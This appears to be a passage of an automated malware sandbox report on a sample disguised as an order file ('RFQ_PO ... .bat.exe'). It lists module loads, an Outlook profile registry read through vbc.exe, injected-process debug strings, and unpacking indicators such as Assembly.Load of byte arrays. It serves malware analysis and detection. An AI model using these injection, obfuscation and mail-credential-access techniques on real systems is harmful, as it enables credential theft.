                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic file information: File size 1432064 > 1048576
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x15aa00
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\SpreadsheetCompare.pdb source: alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: vbc.exe, 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdb source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2050845345.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdb source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2031098154.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdb source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdbn#n source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdbGCTL source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: alg.exe, 0000000B.00000003.2061513893.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdbGCTL source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: 0xC6CF0F5C [Wed Sep 11 20:17:32 2075 UTC]
                  Source: pingsender.exe.9.drStatic PE information: section name: .00cfg
                  Source: pingsender.exe.9.drStatic PE information: section name: .voltbl
                  Source: plugin-container.exe.9.drStatic PE information: section name: .00cfg
                  Source: plugin-container.exe.9.drStatic PE information: section name: .voltbl
                  Source: private_browsing.exe.9.drStatic PE information: section name: .00cfg
                  Source: private_browsing.exe.9.drStatic PE information: section name: .voltbl
                  Source: updater.exe.9.drStatic PE information: section name: .00cfg
